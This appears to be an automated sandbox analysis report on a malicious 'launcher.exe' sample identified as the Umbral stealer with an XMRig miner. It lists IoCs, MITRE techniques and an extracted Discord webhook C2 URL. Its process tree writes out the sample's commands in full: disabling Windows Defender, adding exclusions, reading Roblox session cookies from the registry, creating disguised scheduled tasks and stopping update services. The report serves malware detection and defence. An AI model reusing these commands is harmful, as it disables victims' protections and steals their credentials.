umbral | a13dd805f2700173d410809954b9d98ae3586c0c65c20270a378887d83b738b0

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-12-2024 11:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

launcher.exe
Size

40.0MB
MD5

bad6b4ffa6b16bbd802f3f4f887760b2
SHA1

d45d0a086cf87cf14aa129a9b34d5c9f80ab6ae2
SHA256

a13dd805f2700173d410809954b9d98ae3586c0c65c20270a378887d83b738b0
SHA512

fc0398c9ab294dc3f379e1129fbb20e35fcbae728a1619aa3c1f316541dbbb717d9662feca11dd2e1f45c814b2debb9468b99830c8ea33ebff47bc474a87cd1c
SSDEEP

786432:IDOEGyqaCfzdbbTBYlx6Tstl7wi48Yi/xOMx75Ss5VR4L50IhbURTq3:ID7glBYyYtxw58rxOMFXRRIhbU1O

Score

10^/10

umbral xmrig credential_access discovery evasion execution miner persistence spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1309680533873360936/uVtzVucttcbKyCjWXREr4bqVIC4bqsg6Vda7TrljGA2r8SckL-SAvJtdmPA1c9E72q_q

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a0000000167ea-36.dat	family_umbral
behavioral1/memory/2036-38-0x0000000001350000-0x0000000001390000-memory.dmp	family_umbral

Suspicious use of NtCreateUserProcessOtherParentProcess 32 IoCs

description	pid	Process	procid_target
PID 2260 created 1216	2260	cs2.exe	21
PID 2260 created 1216	2260	cs2.exe	21
PID 2260 created 1216	2260	cs2.exe	21
PID 2260 created 1216	2260	cs2.exe	21
PID 2260 created 1216	2260	cs2.exe	21
PID 1708 created 1216	1708	updater.exe	21
PID 1708 created 1216	1708	updater.exe	21
PID 1708 created 1216	1708	updater.exe	21
PID 1708 created 1216	1708	updater.exe	21
PID 1708 created 1216	1708	updater.exe	21
PID 1708 created 1216	1708	updater.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21
PID 932 created 1216	932	conhost.exe	21

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral1/memory/1708-111-0x000000013F5B0000-0x0000000143274000-memory.dmp	xmrig
behavioral1/memory/1964-172-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-214-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-255-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-297-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-338-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-381-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-424-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-465-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-506-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-547-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-589-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-630-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1964-670-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1952	powershell.exe
2732	powershell.exe
2000	powershell.exe
2060	powershell.exe
2424	powershell.exe
2340	powershell.exe
1344	powershell.exe
2532	powershell.exe
1932	powershell.exe
2184	powershell.exe
1032	powershell.exe
1632	powershell.exe
2152	powershell.exe
2236	powershell.exe
2452	powershell.exe
3028	powershell.exe
3024	powershell.exe
2648	powershell.exe
2916	powershell.exe
884	powershell.exe
1308	powershell.exe
2420	powershell.exe
864	powershell.exe
2164	powershell.exe
1032	powershell.exe
2568	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Stealer.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe	launcher.exe

Executes dropped EXE 5 IoCs

pid	Process
2260	cs2.exe
2968	kaban.exe
2036	Stealer.exe
1048	Client.exe
1708	updater.exe

Loads dropped DLL 2 IoCs

pid	Process
2108	launcher.exe
1376	taskeng.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\cs2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\cs2.exe"	launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\kaban = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kaban.exe"	launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stealer = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Stealer.exe"	launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Client.exe"	launcher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
10	discord.com
11	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2764	cmd.exe
2864	powercfg.exe
2188	cmd.exe
2696	powercfg.exe
1552	powercfg.exe
2052	powercfg.exe
3000	powercfg.exe
1164	powercfg.exe
1632	powercfg.exe
2180	powercfg.exe

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1708 set thread context of 932	1708	updater.exe	92
PID 1708 set thread context of 1964	1708	updater.exe	93

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\svchost.exe	kaban.exe
File opened for modification	C:\Program Files\svchost.exe	kaban.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2352	sc.exe
2152	sc.exe
2796	sc.exe
2752	sc.exe
2452	sc.exe
2220	sc.exe
2640	sc.exe
2328	sc.exe
2824	sc.exe
2984	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2064	wmic.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2260	schtasks.exe
2828	schtasks.exe
1508	schtasks.exe
2440	schtasks.exe
1036	schtasks.exe
2992	schtasks.exe
1656	schtasks.exe
1960	schtasks.exe
2072	schtasks.exe
648	schtasks.exe
2800	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2532	powershell.exe
2060	powershell.exe
1632	powershell.exe
2424	powershell.exe
2260	cs2.exe
2260	cs2.exe
1952	powershell.exe
2260	cs2.exe
2260	cs2.exe
2260	cs2.exe
2260	cs2.exe
2260	cs2.exe
2260	cs2.exe
2164	powershell.exe
2260	cs2.exe
2260	cs2.exe
1932	powershell.exe
3024	powershell.exe
1032	powershell.exe
1708	updater.exe
1708	updater.exe
2092	powershell.exe
2340	powershell.exe
1708	updater.exe
1708	updater.exe
1708	updater.exe
1708	updater.exe
1708	updater.exe
1708	updater.exe
2648	powershell.exe
1708	updater.exe
1708	updater.exe
1708	updater.exe
1708	updater.exe
2916	powershell.exe
1964	conhost.exe
1964	conhost.exe
1964	conhost.exe
1964	conhost.exe
1964	conhost.exe
1964	conhost.exe
1964	conhost.exe
1964	conhost.exe
1964	conhost.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
1964	conhost.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
2968	kaban.exe
1964	conhost.exe
2968	kaban.exe
2968	kaban.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	2968	kaban.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	2036	Stealer.exe
Token: SeDebugPrivilege	1048	Client.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeShutdownPrivilege	2696	powercfg.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeShutdownPrivilege	1552	powercfg.exe
Token: SeShutdownPrivilege	3000	powercfg.exe
Token: SeShutdownPrivilege	2052	powercfg.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeShutdownPrivilege	1164	powercfg.exe
Token: SeShutdownPrivilege	2864	powercfg.exe
Token: SeShutdownPrivilege	1632	powercfg.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeShutdownPrivilege	2180	powercfg.exe
Token: SeLockMemoryPrivilege	1964	conhost.exe
Token: SeLockMemoryPrivilege	1964	conhost.exe
Token: SeIncreaseQuotaPrivilege	2536	wmic.exe
Token: SeSecurityPrivilege	2536	wmic.exe
Token: SeTakeOwnershipPrivilege	2536	wmic.exe
Token: SeLoadDriverPrivilege	2536	wmic.exe
Token: SeSystemProfilePrivilege	2536	wmic.exe
Token: SeSystemtimePrivilege	2536	wmic.exe
Token: SeProfSingleProcessPrivilege	2536	wmic.exe
Token: SeIncBasePriorityPrivilege	2536	wmic.exe
Token: SeCreatePagefilePrivilege	2536	wmic.exe
Token: SeBackupPrivilege	2536	wmic.exe
Token: SeRestorePrivilege	2536	wmic.exe
Token: SeShutdownPrivilege	2536	wmic.exe
Token: SeDebugPrivilege	2536	wmic.exe
Token: SeSystemEnvironmentPrivilege	2536	wmic.exe
Token: SeRemoteShutdownPrivilege	2536	wmic.exe
Token: SeUndockPrivilege	2536	wmic.exe
Token: SeManageVolumePrivilege	2536	wmic.exe
Token: 33	2536	wmic.exe
Token: 34	2536	wmic.exe
Token: 35	2536	wmic.exe
Token: SeIncreaseQuotaPrivilege	2536	wmic.exe
Token: SeSecurityPrivilege	2536	wmic.exe
Token: SeTakeOwnershipPrivilege	2536	wmic.exe
Token: SeLoadDriverPrivilege	2536	wmic.exe
Token: SeSystemProfilePrivilege	2536	wmic.exe
Token: SeSystemtimePrivilege	2536	wmic.exe
Token: SeProfSingleProcessPrivilege	2536	wmic.exe
Token: SeIncBasePriorityPrivilege	2536	wmic.exe
Token: SeCreatePagefilePrivilege	2536	wmic.exe
Token: SeBackupPrivilege	2536	wmic.exe
Token: SeRestorePrivilege	2536	wmic.exe
Token: SeShutdownPrivilege	2536	wmic.exe
Token: SeDebugPrivilege	2536	wmic.exe
Token: SeSystemEnvironmentPrivilege	2536	wmic.exe
Token: SeRemoteShutdownPrivilege	2536	wmic.exe
Token: SeUndockPrivilege	2536	wmic.exe
Token: SeManageVolumePrivilege	2536	wmic.exe
Token: 33	2536	wmic.exe
Token: 34	2536	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 2532	2108	launcher.exe	30
PID 2108 wrote to memory of 2532	2108	launcher.exe	30
PID 2108 wrote to memory of 2532	2108	launcher.exe	30
PID 2108 wrote to memory of 2260	2108	launcher.exe	32
PID 2108 wrote to memory of 2260	2108	launcher.exe	32
PID 2108 wrote to memory of 2260	2108	launcher.exe	32
PID 2108 wrote to memory of 2060	2108	launcher.exe	33
PID 2108 wrote to memory of 2060	2108	launcher.exe	33
PID 2108 wrote to memory of 2060	2108	launcher.exe	33
PID 2108 wrote to memory of 2968	2108	launcher.exe	35
PID 2108 wrote to memory of 2968	2108	launcher.exe	35
PID 2108 wrote to memory of 2968	2108	launcher.exe	35
PID 2108 wrote to memory of 1632	2108	launcher.exe	36
PID 2108 wrote to memory of 1632	2108	launcher.exe	36
PID 2108 wrote to memory of 1632	2108	launcher.exe	36
PID 2108 wrote to memory of 2036	2108	launcher.exe	39
PID 2108 wrote to memory of 2036	2108	launcher.exe	39
PID 2108 wrote to memory of 2036	2108	launcher.exe	39
PID 2108 wrote to memory of 2424	2108	launcher.exe	40
PID 2108 wrote to memory of 2424	2108	launcher.exe	40
PID 2108 wrote to memory of 2424	2108	launcher.exe	40
PID 2108 wrote to memory of 1048	2108	launcher.exe	42
PID 2108 wrote to memory of 1048	2108	launcher.exe	42
PID 2108 wrote to memory of 1048	2108	launcher.exe	42
PID 2928 wrote to memory of 2220	2928	cmd.exe	47
PID 2928 wrote to memory of 2220	2928	cmd.exe	47
PID 2928 wrote to memory of 2220	2928	cmd.exe	47
PID 2928 wrote to memory of 2640	2928	cmd.exe	48
PID 2928 wrote to memory of 2640	2928	cmd.exe	48
PID 2928 wrote to memory of 2640	2928	cmd.exe	48
PID 2928 wrote to memory of 2328	2928	cmd.exe	49
PID 2928 wrote to memory of 2328	2928	cmd.exe	49
PID 2928 wrote to memory of 2328	2928	cmd.exe	49
PID 2928 wrote to memory of 2352	2928	cmd.exe	50
PID 2928 wrote to memory of 2352	2928	cmd.exe	50
PID 2928 wrote to memory of 2352	2928	cmd.exe	50
PID 2928 wrote to memory of 2152	2928	cmd.exe	51
PID 2928 wrote to memory of 2152	2928	cmd.exe	51
PID 2928 wrote to memory of 2152	2928	cmd.exe	51
PID 2188 wrote to memory of 2696	2188	cmd.exe	56
PID 2188 wrote to memory of 2696	2188	cmd.exe	56
PID 2188 wrote to memory of 2696	2188	cmd.exe	56
PID 2188 wrote to memory of 1552	2188	cmd.exe	57
PID 2188 wrote to memory of 1552	2188	cmd.exe	57
PID 2188 wrote to memory of 1552	2188	cmd.exe	57
PID 2188 wrote to memory of 3000	2188	cmd.exe	58
PID 2188 wrote to memory of 3000	2188	cmd.exe	58
PID 2188 wrote to memory of 3000	2188	cmd.exe	58
PID 2164 wrote to memory of 2992	2164	powershell.exe	59
PID 2164 wrote to memory of 2992	2164	powershell.exe	59
PID 2164 wrote to memory of 2992	2164	powershell.exe	59
PID 2188 wrote to memory of 2052	2188	cmd.exe	60
PID 2188 wrote to memory of 2052	2188	cmd.exe	60
PID 2188 wrote to memory of 2052	2188	cmd.exe	60
PID 1376 wrote to memory of 1708	1376	taskeng.exe	64
PID 1376 wrote to memory of 1708	1376	taskeng.exe	64
PID 1376 wrote to memory of 1708	1376	taskeng.exe	64
PID 2036 wrote to memory of 1932	2036	Stealer.exe	66
PID 2036 wrote to memory of 1932	2036	Stealer.exe	66
PID 2036 wrote to memory of 1932	2036	Stealer.exe	66
PID 2036 wrote to memory of 3024	2036	Stealer.exe	68
PID 2036 wrote to memory of 3024	2036	Stealer.exe	68
PID 2036 wrote to memory of 3024	2036	Stealer.exe	68
PID 2036 wrote to memory of 1032	2036	Stealer.exe	70

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1216
- C:\Users\Admin\AppData\Local\Temp\launcher.exe
  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cs2.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2532
- - C:\Users\Admin\AppData\Local\Temp\cs2.exe
    "C:\Users\Admin\AppData\Local\Temp\cs2.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kaban.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2060
- - C:\Users\Admin\AppData\Local\Temp\kaban.exe
    "C:\Users\Admin\AppData\Local\Temp\kaban.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
  - - C:\Windows\system32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio Host" /tr "C:\Program Files\svchost.exe" & exit
      4⤵
      PID:2052
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio Host" /tr "C:\Program Files\svchost.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:648
  - - C:\Windows\system32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "F.lux" /tr "C:\Program Files\svchost.exe" /RL HIGHEST & exit
      4⤵
      PID:2368
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "F.lux" /tr "C:\Program Files\svchost.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2092
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2536
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:2116
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2916
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Client.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1952
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2928
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2220
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2640
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2328
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2352
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2152
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2696
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1552
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3000
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
